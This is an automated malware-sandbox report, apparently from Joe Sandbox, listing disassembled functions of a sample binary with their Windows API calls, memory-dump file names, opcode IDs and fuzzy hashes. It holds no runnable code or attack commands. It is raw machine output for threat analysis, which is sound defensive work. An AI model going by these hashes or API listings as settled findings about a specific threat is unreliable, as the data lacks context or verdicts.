Instruction Fuzzy Hash: 5911E572904365FFCB019FE8FC09A9E7BACAB45321F104256FD25E3290D2B08D1087A4

Function 001ED1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,001ECFF9,00000000,00000004,00000000), ref: 001ED218
GetLastError.KERNEL32 ref: 001ED224
__dosmaperr.LIBCMT ref: 001ED22B
ResumeThread.KERNEL32(00000000), ref: 001ED249

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: baeee25ec549c156b88f9e170d6ad5c044440c02a57597679cc10998e7af9f01
Instruction ID: 33cd15b74517ef1b7b8ee88ea25fec951d0dcc153f71e9644da36b60c1d9cc84
Opcode Fuzzy Hash: baeee25ec549c156b88f9e170d6ad5c044440c02a57597679cc10998e7af9f01
Instruction Fuzzy Hash: 84014936805A4ABFC7106BA7FC09BAE7B69DF91731F204258FA24920D0DF70C841C6A0

Function 001C600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001C604C
GetStockObject.GDI32(00000011), ref: 001C6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 001C606A

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 04e85385610ecede8cf6548009294e48a5b3baf993f471078b1028075ef7696f
Instruction ID: 97d78ee7130bc23fd52df9e83e599a9123398fdbebf6be5dd2fab19a4e3bc981
Opcode Fuzzy Hash: 04e85385610ecede8cf6548009294e48a5b3baf993f471078b1028075ef7696f
Instruction Fuzzy Hash: 5411AD72101608BFEF164FA49C48FEABB6DEF1C3A5F11021AFA0462010D736DC60DBA0

Function 001E3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 001E3B56

Part of subcall function 001E3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 001E3AD2
Part of subcall function 001E3AA3: ___AdjustPointer.LIBCMT ref: 001E3AED

_UnwindNestedFrames.LIBCMT ref: 001E3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 001E3B7C
CallCatchBlock.LIBVCRUNTIME ref: 001E3BA4

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 3108efbc01920abbf91096040a203bcfd84678ce4e98cbf6c866c44b5f1516c9
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 90012932100589BBDF126E96CC46EEF3B6AEF98754F044014FE5896121C732E961EBA0

Function 001F3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001C13C6,00000000,00000000,?,001F301A,001C13C6,00000000,00000000,00000000,?,001F328B,00000006,FlsSetValue), ref: 001F30A5
GetLastError.KERNEL32(?,001F301A,001C13C6,00000000,00000000,00000000,?,001F328B,00000006,FlsSetValue,00262290,FlsSetValue,00000000,00000364,?,001F2E46), ref: 001F30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001F301A,001C13C6,00000000,00000000,00000000,?,001F328B,00000006,FlsSetValue,00262290,FlsSetValue,00000000), ref: 001F30BF

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: f45ec92e3ee21a206969372b7f676984619fd6c6890403cabfc6ab24103ce8d7
Instruction ID: 797f90f7b345e76604fba4bdf7f87cb187c4d73c287fb027d185ca935a8617c7
Opcode Fuzzy Hash: f45ec92e3ee21a206969372b7f676984619fd6c6890403cabfc6ab24103ce8d7
Instruction Fuzzy Hash: 0201AC3271172AAFC7314B79AC48D7B77989F45BA1B214621FE25D7240DF31D941C6E0

Function 00227464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0022747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00227497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002274AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002274CA

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: c22c7a39bff6937771acf7ab76e2071afa750ab030be1df4f25dc41978c4be84
Instruction ID: 04f24a099b8000a4e1f504db4c8a6ab1ce32ecbde37efd4996ad0c9547821ccf
Opcode Fuzzy Hash: c22c7a39bff6937771acf7ab76e2071afa750ab030be1df4f25dc41978c4be84
Instruction Fuzzy Hash: 5A11A1B5229321AFF7209F94FC08F927BFCEB00B00F108569A616D6151EBB0E914DB61

Function 0022B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0022ACD3,?,00008000), ref: 0022B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0022ACD3,?,00008000), ref: 0022B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0022ACD3,?,00008000), ref: 0022B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0022ACD3,?,00008000), ref: 0022B126

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: cfdc1995362058a66e6f437643162b11632f35fc0a34b1fd7a9c20e4ce8432f5
Instruction ID: 48af020fdd5e02946d85ac06404037cbc2c2d112fcd05691f9a8d7ab57707901
Opcode Fuzzy Hash: cfdc1995362058a66e6f437643162b11632f35fc0a34b1fd7a9c20e4ce8432f5
Instruction Fuzzy Hash: D6116D31C21A3DEBDF01AFE4F9686EEBBB8FF09711F108096D945B2281DB7056608B55

Function 00222DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00222DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00222DD6
GetCurrentThreadId.KERNEL32 ref: 00222DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00222DE4

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: a4adb17c6e1cc9c3207f336e6632c753aa7ef6d826ff189bbcef53273495e1b2
Instruction ID: 4f04771abaa023bb39cc888452dd6534d697694ae9b523e030b0e4f21e786092
Opcode Fuzzy Hash: a4adb17c6e1cc9c3207f336e6632c753aa7ef6d826ff189bbcef53273495e1b2
Instruction Fuzzy Hash: 5BE06D72111334BBD7201BB2BC0DEEB3E6CEB83BA2F100015B105D1080AAA58944C6B0

Function 00258863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 001D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001D9693
Part of subcall function 001D9639: SelectObject.GDI32(?,00000000), ref: 001D96A2
Part of subcall function 001D9639: BeginPath.GDI32(?), ref: 001D96B9
Part of subcall function 001D9639: SelectObject.GDI32(?,00000000), ref: 001D96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00258887
LineTo.GDI32(?,?,?), ref: 00258894
EndPath.GDI32(?), ref: 002588A4
StrokePath.GDI32(?), ref: 002588B2

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 0b9c2308ab49ba7f48ccd417d9eed7810a4f20689506e28d14f0722debceb28f
Instruction ID: 723c7f04813d1d1f13c6479d1bf988c32dd541ff217693cbd7c65735baf7da0c
Opcode Fuzzy Hash: 0b9c2308ab49ba7f48ccd417d9eed7810a4f20689506e28d14f0722debceb28f
Instruction Fuzzy Hash: 12F0343604135ABAEB126F94AC0EFCA3B69AF06312F148001FA21650E2C7B55525CBA9

Function 001D98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 001D98CC
SetTextColor.GDI32(?,?), ref: 001D98D6
SetBkMode.GDI32(?,00000001), ref: 001D98E9
GetStockObject.GDI32(00000005), ref: 001D98F1

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 14ef634291213fe90df7474fd8213d89c4897b2fad57687af2c529f74a94670e
Instruction ID: 6092239e3c54c0a21f4f00ad6c1263bacd56708c6adb621ecfaeadf1d2957e4d
Opcode Fuzzy Hash: 14ef634291213fe90df7474fd8213d89c4897b2fad57687af2c529f74a94670e
Instruction Fuzzy Hash: E1E06D31244780AEDB215F78BC0DBE83F61AB52336F24C21AFAFA581E1D77146909B10

Function 0022162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00221634
OpenThreadToken.ADVAPI32(00000000,?,?,?,002211D9), ref: 0022163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002211D9), ref: 00221648
OpenProcessToken.ADVAPI32(00000000,?,?,?,002211D9), ref: 0022164F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: b20d3d020cd7d813727016cf8f6e5546bf3b9db4c7eb11d7e33a162f9262b038
Instruction ID: f1c5a6d4a3a1e7ed0f881e89e2bd7ca0218e2b576b251419ebc712eaafe606f7
Opcode Fuzzy Hash: b20d3d020cd7d813727016cf8f6e5546bf3b9db4c7eb11d7e33a162f9262b038
Instruction Fuzzy Hash: DEE04F71612322BFD7201FE0BD0DB5A3B6CAF54B92F244848F645C9080E6344450C758

Function 0021D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0021D858
GetDC.USER32(00000000), ref: 0021D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0021D882
ReleaseDC.USER32(?), ref: 0021D8A3

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: b383a605dc64869b4a3660855a0f804c48cc0569a2a4e84be549eea0afbf4b2b
Instruction ID: a4674299de0a725ac2f7451d6b78feb2a015c954689ed323d9d4d1b1c42ab34e
Opcode Fuzzy Hash: b383a605dc64869b4a3660855a0f804c48cc0569a2a4e84be549eea0afbf4b2b
Instruction Fuzzy Hash: F5E01AB0810304DFCF419FA0E80CA6DBBB5FB58312F208009F81AE7250D7388A42EF44

Function 0021D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0021D86C
GetDC.USER32(00000000), ref: 0021D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0021D882
ReleaseDC.USER32(?), ref: 0021D8A3

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c8d0791112d68cf338c4a4cf256fb0de67a1491060c2009e2310962ca89389a7
Instruction ID: c1ad1640288a7cd0b0210ff0afa8a90400f44364ddeb4422e5341ff0abb8a877
Opcode Fuzzy Hash: c8d0791112d68cf338c4a4cf256fb0de67a1491060c2009e2310962ca89389a7
Instruction Fuzzy Hash: 6FE01A70800300DFCF409FA0E80C66DBBB5FB48312B208009F91AE7250D7385A01DF44

Function 00234D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 001C7620: _wcslen.LIBCMT ref: 001C7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00234ED4

Strings

LPT, xrefs: 00234DFB
*, xrefs: 00234E10

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 2c61c0ae1f9d72f77b8e2122e61be8d2cd839ba1d404ad7a96b30030edf5790d
Instruction ID: 37d0304cca0b614a304f524548501360dc31ca063f1395cda9a8d2f8bfe7a684
Opcode Fuzzy Hash: 2c61c0ae1f9d72f77b8e2122e61be8d2cd839ba1d404ad7a96b30030edf5790d
Instruction Fuzzy Hash: 2E9160B5A102059FCB14DF58C484EA9BBF1BF54304F1880D9E40A9F7A2D775EE95CB90

Function 001EE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001EE30D

Strings

pow, xrefs: 001EE2E5, 001EE302

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 7bfaed1864fa083946c18cf0e69a65af173697afcd2f03f3cd384276733175e9
Instruction ID: 30e2e4296997f5788c524fd79314605fa39e61b4febcad43f930ff4ed44cf30c
Opcode Fuzzy Hash: 7bfaed1864fa083946c18cf0e69a65af173697afcd2f03f3cd384276733175e9
Instruction Fuzzy Hash: 0E51BD61A0CA4A96CB157B15DD013BE3BE4FF50740F348D69E1D6833E9EB318CD59A42

Function 00247771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0021569E,00000000,?,0025CC08,?,00000000,00000000), ref: 002478DD

Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A

CharUpperBuffW.USER32(0021569E,00000000,?,0025CC08,00000000,?,00000000,00000000), ref: 0024783B

Strings

<s(, xrefs: 002477C8

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s(
API String ID: 3544283678-3818342185
Opcode ID: fe02c6d5ad5d45be9aaf20a63b0a29ba8b0369a64ca1f2dbd37ba4d5c4551b6a
Instruction ID: 8fb78c8795e09c566fd565347145fc9328c199cef4432a156d3b445583af0566
Opcode Fuzzy Hash: fe02c6d5ad5d45be9aaf20a63b0a29ba8b0369a64ca1f2dbd37ba4d5c4551b6a
Instruction Fuzzy Hash: 8D615D32924119ABCF09EFE4DC91EFDB378BF38304B544529E552A7091EF709A15DBA0

Function 001DE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 001DE1B1

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: fecb65bc01bf920c399e5c48f011f3bd90f1f9ae5d713f824e3f34ccec617973
Instruction ID: 4344b2eb55ca5512fcc03e56d384c130df8d8d5dc3979ac057fdebddb99d6b80
Opcode Fuzzy Hash: fecb65bc01bf920c399e5c48f011f3bd90f1f9ae5d713f824e3f34ccec617973
Instruction Fuzzy Hash: BE51EF359002469AEF15AF28C885AFABBE4EF75310F25405AEC919B2D0D7349DA2CB90

Function 001DF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 001DF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 001DF2BB

Strings

@, xrefs: 001DF2AF

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 7ae339392a46ccf421eee475b7e896ae73bd4835a3ef35d36645f926c4ca923d
Instruction ID: d6fe9160b05f8f2f28d1d73bd1511c9f9da5baa92cce5d1dcc86364026d56c8f
Opcode Fuzzy Hash: 7ae339392a46ccf421eee475b7e896ae73bd4835a3ef35d36645f926c4ca923d
Instruction Fuzzy Hash: 2C5136714087449BD320AF14EC86BABBBF8FFA5300F81885DF1D9411A5EB708969CB66

Function 00245745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 002457E0
_wcslen.LIBCMT ref: 002457EC

Strings

CALLARGARRAY, xrefs: 002457E6, 002457EB

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
